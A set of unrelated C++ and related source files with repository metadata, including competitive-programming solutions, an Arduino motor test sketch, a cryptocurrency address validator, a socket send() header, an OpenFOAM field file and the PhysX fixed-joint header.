c85ba323476b03abbc22a758e5724f15796ee62b
refs/heads/master
2016-09-11T02:00:10.773000
2015-04-26T02:41:05
2015-04-26T02:41:05
9,335,477
0
0
null
null
null
null
UTF-8
C++
false
false
4,421
cpp
#include <string> #include <cmath> #include <fstream> #include <iostream> #include <sstream> #include <list> #include <algorithm> #include <set> #include <map> #include <stack> #include <queue> #include <numeric> #include <bitset> #include <deque> //#include <random> #include <string.h> #include <stdlib.h> #include <vector> #include <unordered_map> #include <thread> const long long LINF = (5e18); const int INF = (1<<30); const int sINF = (1<<23); const int MOD = 1000000009; const double EPS = 1e-6; using namespace std; class Ethernet { public: vector<int> dist; vector<vector<int> > g, dp; int maxDist; int f(int x, int maxDepth) { if (dp[x][maxDepth] != -1) return dp[x][maxDepth]; int res = 1; for (int y: g[x]) res += f(y, maxDist); for (int y: g[x]) { for (int m=dist[y-1]; m <= maxDepth; ++m) { int r = min(maxDist - m, m); int tem = f(y, m - dist[y-1]); for (int z: g[x]) { if (y == z) continue; int cut = f(z, maxDist); if (dist[z-1] > r) { tem += cut; } else { int with = f(z, r - dist[z-1]) - 1; tem += min(cut, with); } } res = min(res, tem); } } return dp[x][maxDepth] = res; } int connect(vector <int> parent, vector <int> dist, int maxDist) { int N = (int)parent.size() + 1; this->dist = dist; this->maxDist = maxDist; dp.clear(); dp.resize(N+1, vector<int>(maxDist+1, -1)); g.clear(); g.resize(N); for (int i=1; i<N; ++i) g[parent[i-1]].push_back(i); return f(0, maxDist); } // BEGIN CUT HERE public: void run_test(int Case) { if ((Case == -1) || (Case == 0)) test_case_0(); if ((Case == -1) || (Case == 1)) test_case_1(); if ((Case == -1) || (Case == 2)) test_case_2(); if ((Case == -1) || (Case == 3)) test_case_3(); if ((Case == -1) || (Case == 4)) test_case_4(); } private: template <typename T> string print_array(const vector<T> &V) { ostringstream os; os << "{ "; for (typename vector<T>::const_iterator iter = V.begin(); iter != V.end(); ++iter) os << '\"' << *iter << "\","; os << " }"; return os.str(); } void verify_case(int Case, const int &Expected, const int &Received) { cerr << "Test Case #" << Case << "..."; if (Expected == Received) cerr << "PASSED" << endl; else { cerr << "FAILED" << endl; cerr << "\tExpected: \"" << Expected << '\"' << endl; cerr << "\tReceived: \"" << Received << '\"' << endl; } } void test_case_0() { int Arr0[] = {0,0,0}; vector <int> Arg0(Arr0, Arr0 + (sizeof(Arr0) / sizeof(Arr0[0]))); int Arr1[] = {1,1,1}; vector <int> Arg1(Arr1, Arr1 + (sizeof(Arr1) / sizeof(Arr1[0]))); int Arg2 = 2; int Arg3 = 1; verify_case(0, Arg3, connect(Arg0, Arg1, Arg2)); } void test_case_1() { int Arr0[] = {0,0,0,0,0,0,0}; vector <int> Arg0(Arr0, Arr0 + (sizeof(Arr0) / sizeof(Arr0[0]))); int Arr1[] = {1,2,3,4,5,6,7}; vector <int> Arg1(Arr1, Arr1 + (sizeof(Arr1) / sizeof(Arr1[0]))); int Arg2 = 8; int Arg3 = 4; verify_case(1, Arg3, connect(Arg0, Arg1, Arg2)); } void test_case_2() { int Arr0[] = {0,1,2,3,4,5}; vector <int> Arg0(Arr0, Arr0 + (sizeof(Arr0) / sizeof(Arr0[0]))); int Arr1[] = {1,2,3,4,5,6}; vector <int> Arg1(Arr1, Arr1 + (sizeof(Arr1) / sizeof(Arr1[0]))); int Arg2 = 6; int Arg3 = 3; verify_case(2, Arg3, connect(Arg0, Arg1, Arg2)); } void test_case_3() { int Arr0[] = {0,0,0,1,1}; vector <int> Arg0(Arr0, Arr0 + (sizeof(Arr0) / sizeof(Arr0[0]))); int Arr1[] = {1,1,1,1,1}; vector <int> Arg1(Arr1, Arr1 + (sizeof(Arr1) / sizeof(Arr1[0]))); int Arg2 = 2; int Arg3 = 2; verify_case(3, Arg3, connect(Arg0, Arg1, Arg2)); } void test_case_4() { int Arr0[] = {0,1,0,3,0,5,0,6,0,6,0,6,4,6,9,4,5,5,2,5,2}; vector <int> Arg0(Arr0, Arr0 + (sizeof(Arr0) / sizeof(Arr0[0]))); int Arr1[] = {93,42,104,105,59,73,161,130,30,81,62,93,131,133,139,5,13,34,25,111,4}; vector <int> Arg1(Arr1, Arr1 + (sizeof(Arr1) / sizeof(Arr1[0]))); int Arg2 = 162; int Arg3 = 11; verify_case(4, Arg3, connect(Arg0, Arg1, Arg2)); } // END CUT HERE }; // BEGIN CUT HERE int main() { Ethernet ___test; ___test.run_test(-1); } // END CUT HERE
4fee11a6cca3082d5d11a08d7164f317892603ea
d3eb25c0e78071943868723b6e677167105a63af
/vnc-gtav/GTAVScriptHookProxy/include/ScriptHookSharedMemory.h
458a60d9a0c8a5b179aa2d4fa8d6055c5caecc17
[]
no_license
williamseto/universe-windows-envs
31d9c73a2f228e2e8e2bd059c566847510552ce1
a687bd1b51f428a88a45c98b48bfedf5025c01b5
refs/heads/master
2021-01-22T08:17:57.487068
2017-05-02T18:25:28
2017-05-02T18:25:28
81,886,434
1
0
null
2017-02-14T00:29:00
2017-02-14T00:29:00
null
UTF-8
C++
false
false
455
h
#pragma once #include <SharedAgentMemory.h> namespace OpenAIGym { class ScriptHookSharedMemory { public: static SharedAgentMemory * shared(); static void allocate_shared_agent_memory(); static SharedAgentMemory* get_shared_agent_data(); static void destroy_shared_agent_memory(); private: ScriptHookSharedMemory() = delete; ~ScriptHookSharedMemory() = delete; ScriptHookSharedMemory(const ScriptHookSharedMemory &) = delete; }; }
0741cc3987604db726cbfd9d3edba49021aadbbf
09a320e960b0af9210a659b9cce9f155d3ab99b9
/ch15/p11.cpp
999188e4037823fc216973a91209f0898f321bea
[]
no_license
hiteshkansal/Karumanchi
7f53d3289a4af3aba5ca9712cce1336f4e126752
84802ac10888bc8316658663e7f2491998b4bf22
refs/heads/master
2021-01-21T20:38:48.941685
2017-05-24T07:55:39
2017-05-24T07:55:39
92,263,712
0
0
null
null
null
null
UTF-8
C++
false
false
729
cpp
#include<iostream> #include<string.h> #include<algorithm> using namespace std; void combi(int d, int s, char *word, char* a, int n) { for(int i=s; i<n; i++) { word[d] = a[i]; word[d+1] = '\0'; cout<<word<<endl; if(i<n-1) combi(d+1,i+1,word,a,n); } } void combi_r(int d, int s, char *word, char* a, int r, int n) { if(d==r) cout<<word<<endl; for(int i=s; i<n; i++) { word[d] = a[i]; word[d+1] = '\0'; combi_r(d+1,i+1,word,a,r,n); } } int main() { char *a = "abcdef"; int n = strlen(a); int r=3; char *word = new char[strlen(a)]; //combi(0,0,word,a,n); combi_r(0,0,word,a,r,n); return 0; }
915ec057e68e2facb2491b54116c564ca3af400b
35a4a74c7fdf094d03df53e5b60ca6a0be025d09
/Motor_Test/Motor_Test.ino
0c354f51da33beec8632f88d501b0511b42af3e4
[ "CC0-1.0" ]
permissive
MarcoSteffens/Lichtuhr
0218294ebe155c0a7ea0de102bebff1ddb9c88d7
8d77f033512fad3035b60329dc58bbad288b1f0b
refs/heads/master
2021-01-10T16:19:09.005564
2016-03-28T10:58:47
2016-03-28T10:58:54
54,197,487
0
0
null
null
null
null
UTF-8
C++
false
false
1,772
ino
//Pins des Motor-Poti const int DIRECTION_A = 10; //B-IB const int DIRECTION_B = 11; //B-IA /* * Geschwindigkeit des Poti. 255 ist Maximum, Werte unter 200 gingen bei mir gar nicht. * Aber auch bei 200 hakt das Poti schon. */ const int SPEED = 200; /* ******************************************************************************************************************* */ unsigned long time = millis(); const unsigned long PERIOD = 5000; //alle 5000ms soll das Poti fahren. const int WAITING = 0; const int RUNNING = 1; int status = WAITING; const int NONE = 0; const int UP = 1; const int DOWN = 2; int direction = NONE; /**************************************************************************** * void setup() ****************************************************************************/ void setup() { Serial.begin(9600); //Poti in Startposition fahren: analogWrite(DIRECTION_A, SPEED); analogWrite(DIRECTION_B, 0); delay(400); analogWrite(DIRECTION_A, 0); analogWrite(DIRECTION_B, 0); delay(2000); } /**************************************************************************** * void loop() ****************************************************************************/ void loop() { if (direction == NONE) { direction = UP; analogWrite(DIRECTION_A, 0); analogWrite(DIRECTION_B, SPEED); delay(2000); } else if (direction == UP) { direction = DOWN; analogWrite(DIRECTION_A, SPEED); analogWrite(DIRECTION_B, 0); delay(2000); } else if (direction == DOWN) { direction = NONE; status = WAITING; analogWrite(DIRECTION_A, 0); analogWrite(DIRECTION_B, 0); delay(PERIOD); } }
0bbcdf4250caae7f048307edc12c581a8b448c93
3bc95589dbd26f2857ebe9ffbfa3d07cd490defa
/src/qt/perfectcoinaddressvalidator.cpp
bde8d895e82aa7338812399a7aece81283890185
[ "MIT" ]
permissive
perfectcoincore/perfectcoin
5e840973b09081845c38e26e0c6d95e95fae3389
32dcbae0df2798921a9752a1a1371141831f1adc
refs/heads/master
2020-03-21T13:30:48.489603
2018-06-27T06:07:32
2018-06-27T06:07:32
138,610,004
2
0
null
null
null
null
UTF-8
C++
false
false
2,692
cpp
// Copyright (c) 2011-2014 The Bitcoin Core developers // Copyright (c) 2017 The Pigeon Core developers // Distributed under the MIT software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #include "perfectcoinaddressvalidator.h" #include "base58.h" /* Base58 characters are: "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz" This is: - All numbers except for '0' - All upper-case letters except for 'I' and 'O' - All lower-case letters except for 'l' */ PerfectCoinAddressEntryValidator::PerfectCoinAddressEntryValidator(QObject *parent) : QValidator(parent) { } QValidator::State PerfectCoinAddressEntryValidator::validate(QString &input, int &pos) const { Q_UNUSED(pos); // Empty address is "intermediate" input if (input.isEmpty()) return QValidator::Intermediate; // Correction for (int idx = 0; idx < input.size();) { bool removeChar = false; QChar ch = input.at(idx); // Corrections made are very conservative on purpose, to avoid // users unexpectedly getting away with typos that would normally // be detected, and thus sending to the wrong address. switch(ch.unicode()) { // Qt categorizes these as "Other_Format" not "Separator_Space" case 0x200B: // ZERO WIDTH SPACE case 0xFEFF: // ZERO WIDTH NO-BREAK SPACE removeChar = true; break; default: break; } // Remove whitespace if (ch.isSpace()) removeChar = true; // To next character if (removeChar) input.remove(idx, 1); else ++idx; } // Validation QValidator::State state = QValidator::Acceptable; for (int idx = 0; idx < input.size(); ++idx) { int ch = input.at(idx).unicode(); if (((ch >= '0' && ch<='9') || (ch >= 'a' && ch<='z') || (ch >= 'A' && ch<='Z')) && ch != 'I' && ch != 'O') // Characters invalid in both Base58 and Bech32 { // Alphanumeric and not a 'forbidden' character } else { state = QValidator::Invalid; } } return state; } PerfectCoinAddressCheckValidator::PerfectCoinAddressCheckValidator(QObject *parent) : QValidator(parent) { } QValidator::State PerfectCoinAddressCheckValidator::validate(QString &input, int &pos) const { Q_UNUSED(pos); // Validate the passed Pigeon address if (IsValidDestinationString(input.toStdString())) { return QValidator::Acceptable; } return QValidator::Invalid; }
1f15acd47d3140e1151a8bdb5405c21d0f8af2fe
62d33fa0eca8c0145611cd0efe6e9c4d8bb8b378
/Zerojudge/d460.cpp
b10c3bf528730cd94ad97bd8b4cb78670083c9ea
[ "MIT" ]
permissive
yousefalaa2021/OJ
da085e3eba1c80b7998c471bd3aed71d774985f2
67d1d32770376865eba8a9dd1767e97dae68989a
refs/heads/master
2023-03-15T20:16:56.439701
2019-05-01T11:29:10
2019-05-01T11:29:10
null
0
0
null
null
null
null
UTF-8
C++
false
false
606
cpp
#include <iostream> using namespace std; int main() { int a=0; while(cin >> a){ while(a<6) { cout<<"0"<<endl; break; } while(6<=a && a<=11){ cout << "590" << endl; break; } while(12<=a && a<=17){ cout << "790" << endl; break; } while(18<=a && a<=59){ cout << "890" << endl; break; } while(a>=60){ cout << "399" << endl; break; } } return 0; }
00c0d9ff32b0e563e337b0841f9706d32f73bd4a
bac60e8c8cffdec37cb14c3c05dda19ffc164782
/include/liblinuxpp/net/send.hpp
1a6feb77e5302a94b65e5cfe250cbc0262b68667
[ "MIT" ]
permissive
goodfella/liblinuxpp
2ace9cec8d0bf7f64f908edf87e062f88fa137d6
d00f4d17bdf3a27c9219d1b6a0b7fa23af66095b
refs/heads/master
2022-11-07T21:57:14.869427
2020-07-18T23:56:15
2020-07-18T23:56:15
150,447,645
1
0
null
null
null
null
UTF-8
C++
false
false
2,408
hpp
#ifndef LIBLINUXPP_NET_SEND_HPP #define LIBLINUXPP_NET_SEND_HPP #include <netinet/in.h> #include <netinet/ip.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/uio.h> #include <array> #include <vector> #include <libndgpp/net/ipv4_address.hpp> #include <libndgpp/net/port.hpp> namespace linuxpp { namespace net { /** @defgroup net::send net::send * * The send function overload set contains functions which can be used to send data on a socket * * @param sd The socket descriptor to send the message on * @param msghdr The struct msghdr type to use for sending the message * @param flags The flags to use when sending the message * @parma address The address to send the message to * @param port The port to send the message to * @param msg The message to send * @param sockaddr The sockaddr type * @param buffers The struct iovec array to send * @param size_buffers the size of the struct iovec array * * @return The number of bytes sent * @throws ndgpp::error<std::system_error> if an error is encountered * @{ */ std::size_t send(const int sd, const struct msghdr msghdr, const int flags = 0); std::size_t send(const int sd, void const * const msg, std::size_t length, const ndgpp::net::ipv4_address address, const ndgpp::net::port port, const int flags = 0); std::size_t send(const int sd, void const * const msg, std::size_t length, const int flags = 0); std::size_t send(const int sd, void const * const msg, const std::size_t length, const struct ::sockaddr_in sockaddr, const int flags = 0); std::size_t send(const int sd, iovec const * buffers, const std::size_t size_buffers, const ndgpp::net::ipv4_address address, const ndgpp::net::port port, const int flags = 0); std::size_t send(const int sd, iovec const * buffers, const std::size_t size_buffers, const int flags = 0); }} #endif
0776baeabe0a7537cda892bcaef27dc3071dd9d6
c2484df95f009d516bf042dca93857b43a292333
/hackerrank/week34/2/main.cpp
63e40470b2dfdb6d45205379c8cdbae0220cc7d7
[ "Apache-2.0" ]
permissive
seirion/code
545a78c1167ca92776070d61cd86c1c536cd109a
a59df98712c7eeceabc98f6535f7814d3a1c2c9f
refs/heads/master
2022-12-09T19:48:50.444088
2022-12-06T05:25:38
2022-12-06T05:25:38
17,619,607
14
4
null
null
null
null
UTF-8
C++
false
false
805
cpp
#include <iostream> #include <set> #include <functional> using namespace std; bool a[1000001] = {0, }, b[1000001] = {0, }; bool exist(int gcd) { int x(0), y(0); int cand = gcd; while (cand <= 1000000) { if (a[cand]) x = cand; cand += gcd; } if (x == 0) return false; cand = gcd; while (cand <= 1000000) { if (b[cand]) y = cand; cand += gcd; } if (y == 0) return false; cout << x + y << endl; return true; } int main() { int n; cin >> n; int maxi = 1; for (int i = 0; i < n; i++) { int x; cin >> x; a[x] = true; maxi = max(maxi, x); } for (int i = 0; i < n; i++) { int x; cin >> x; b[x] = true; maxi = max(maxi, x); } for (int i = maxi; 1 <= i; i--) { if (exist(i)) break; } return 0; }
f6957ab8e6fb622132b9af82ca89ae4bbb5b124d
4c23be1a0ca76f68e7146f7d098e26c2bbfb2650
/ic8h18/0.0065/CC6H12OOH-EO2
60699897a8f46b7c518867425f376e794ea78795
[]
no_license
labsandy/OpenFOAM_workspace
a74b473903ddbd34b31dc93917e3719bc051e379
6e0193ad9dabd613acf40d6b3ec4c0536c90aed4
refs/heads/master
2022-02-25T02:36:04.164324
2019-08-23T02:27:16
2019-08-23T02:27:16
null
0
0
null
null
null
null
UTF-8
C++
false
false
846
/*--------------------------------*- C++ -*----------------------------------*\ ========= | \\ / F ield | OpenFOAM: The Open Source CFD Toolbox \\ / O peration | Website: https://openfoam.org \\ / A nd | Version: 6 \\/ M anipulation | \*---------------------------------------------------------------------------*/ FoamFile { version 2.0; format ascii; class volScalarField; location "0.0065"; object CC6H12OOH-EO2; } // * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * // dimensions [0 0 0 0 0 0 0]; internalField uniform 3.72666e-40; boundaryField { boundary { type empty; } } // ************************************************************************* //
b79d04302e8dc07d74d98905578c8b41995d932f
4bf2ee10c6594f70c32feb3bcb50eec186daa9cf
/solutions/2592/2592.cpp11.cpp
400c654e524d86c1b4e99b7af7fb6a53eae41e5f
[]
no_license
jwvg0425/boj
7674928dc012ba3c404cef3a76aa753828e09761
4b7e7389cbe55270bd0dab546d6e84817477b0f1
refs/heads/master
2020-07-14T02:37:36.658675
2017-07-13T06:11:44
2017-07-13T06:11:44
94,295,654
0
0
null
null
null
null
UTF-8
C++
false
false
377
cpp
#include <stdio.h> #include <memory.h> #include <vector> #include <algorithm> #include <string> #include <iostream> int main() { int sum = 0; int count[1001] = { 0, }; int maxVal = 0; for (int i = 0; i < 10; i++) { int val; scanf("%d", &val); sum += val; count[val]++; if (count[val] > count[maxVal]) maxVal = val; } printf("%d\n%d", sum / 10, maxVal); }
4721e4707289202ecd0229605b6ff5e45726873b
fc2d01d1afa08ffc46c23901163c37e679c3beaf
/SDK/PhysX/Include/extensions/PxFixedJoint.h
6432de6990efb52e352c1f43e02d4309115e14f3
[]
no_license
seblef/ShadowEngine
a9428607b49cdd41eb22dcbd8504555454e26a0c
fba95e910c63269bfe0a05ab639dc78b6c16ab8b
refs/heads/master
2023-02-14T19:08:25.878492
2021-01-08T16:16:44
2021-01-08T16:16:44
113,681,956
1
0
null
null
null
null
UTF-8
C++
false
false
5,438
h
// This code contains NVIDIA Confidential Information and is disclosed to you // under a form of NVIDIA software license agreement provided separately to you. // // Notice // NVIDIA Corporation and its licensors retain all intellectual property and // proprietary rights in and to this software and related documentation and // any modifications thereto. Any use, reproduction, disclosure, or // distribution of this software and related documentation without an express // license agreement from NVIDIA Corporation is strictly prohibited. // // ALL NVIDIA DESIGN SPECIFICATIONS, CODE ARE PROVIDED "AS IS.". NVIDIA MAKES // NO WARRANTIES, EXPRESSED, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO // THE MATERIALS, AND EXPRESSLY DISCLAIMS ALL IMPLIED WARRANTIES OF NONINFRINGEMENT, // MERCHANTABILITY, AND FITNESS FOR A PARTICULAR PURPOSE. // // Information and code furnished is believed to be accurate and reliable. // However, NVIDIA Corporation assumes no responsibility for the consequences of use of such // information or for any infringement of patents or other rights of third parties that may // result from its use. No license is granted by implication or otherwise under any patent // or patent rights of NVIDIA Corporation. Details are subject to change without notice. // This code supersedes and replaces all information previously supplied. // NVIDIA Corporation products are not authorized for use as critical // components in life support devices or systems without express written approval of // NVIDIA Corporation. // // Copyright (c) 2008-2012 NVIDIA Corporation. All rights reserved. // Copyright (c) 2004-2008 AGEIA Technologies, Inc. All rights reserved. // Copyright (c) 2001-2004 NovodeX AG. All rights reserved. #ifndef PX_FIXEDJOINT_H #define PX_FIXEDJOINT_H /** \addtogroup extensions @{ */ #include "extensions/PxJoint.h" #ifndef PX_DOXYGEN namespace physx { #endif class PxFixedJoint; /** \brief Create a fixed joint. \param[in] physics the physics SDK \param[in] actor0 an actor to which the joint is attached. NULL may be used to attach the joint to a specific point in the world frame \param[in] localFrame0 the position and orientation of the joint relative to actor0 \param[in] actor1 an actor to which the joint is attached. NULL may be used to attach the joint to a specific point in the world frame \param[in] localFrame1 the position and orientation of the joint relative to actor1 @see PxFixedJoint */ PxFixedJoint* PxFixedJointCreate(PxPhysics& physics, PxRigidActor* actor0, const PxTransform& localFrame0, PxRigidActor* actor1, const PxTransform& localFrame1); /** \brief A fixed joint permits no relative movement between two bodies. ie the bodies are glued together. \image html fixedJoint.png @see PxFixedJointCreate() PxJoint */ class PxFixedJoint: public PxJoint { public: static const PxJointType::Enum Type = PxJointType::eFIXED; /** \brief Set the linear tolerance threshold for projection. Projection is enabled if PxConstraintFlag::ePROJECTION is set for the joint. If the joint separates by more than this distance along its locked degrees of freedom, the solver will move the bodies to close the distance. Setting a very small tolerance may result in simulation jitter or other artifacts. Sometimes it is not possible to project (for example when the joints form a cycle). <b>Range:</b> [0,inf)<br> <b>Default:</b> 1e10f \param[in] tolerance the linear tolerance threshold @see getProjectionLinearTolerance() PxJoint::setConstraintFlags() PxConstraintFlag::ePROJECTION */ virtual void setProjectionLinearTolerance(PxReal tolerance) = 0; /** \brief Get the linear tolerance threshold for projection. \return the linear tolerance threshold @see setProjectionLinearTolerance() PxJoint::setConstraintFlag() */ virtual PxReal getProjectionLinearTolerance() const = 0; /** \brief Set the angular tolerance threshold for projection. Projection is enabled if PxConstraintFlag::ePROJECTION is set for the joint. If the joint deviates by more than this angle around its locked angular degrees of freedom, the solver will move the bodies to close the angle. Setting a very small tolerance may result in simulation jitter or other artifacts. Sometimes it is not possible to project (for example when the joints form a cycle). <b>Range:</b> [0,Pi] <br> <b>Default:</b> Pi \param[in] tolerance the angular tolerance threshold in radians @see getProjectionAngularTolerance() PxJoint::setConstraintFlag() PxConstraintFlag::ePROJECTION */ virtual void setProjectionAngularTolerance(PxReal tolerance) = 0; /** \brief Get the angular tolerance threshold for projection. \return the angular tolerance threshold in radians @see setProjectionAngularTolerance() */ virtual PxReal getProjectionAngularTolerance() const = 0; virtual const char* getConcreteTypeName() const { return "PxFixedJoint"; } protected: PxFixedJoint(PxRefResolver& v) : PxJoint(v) {} PxFixedJoint() {} virtual bool isKindOf(const char* name) const { return !strcmp("PxFixedJoint", name) || PxJoint::isKindOf(name); } }; #ifndef PX_DOXYGEN } // namespace physx #endif /** @} */ #endif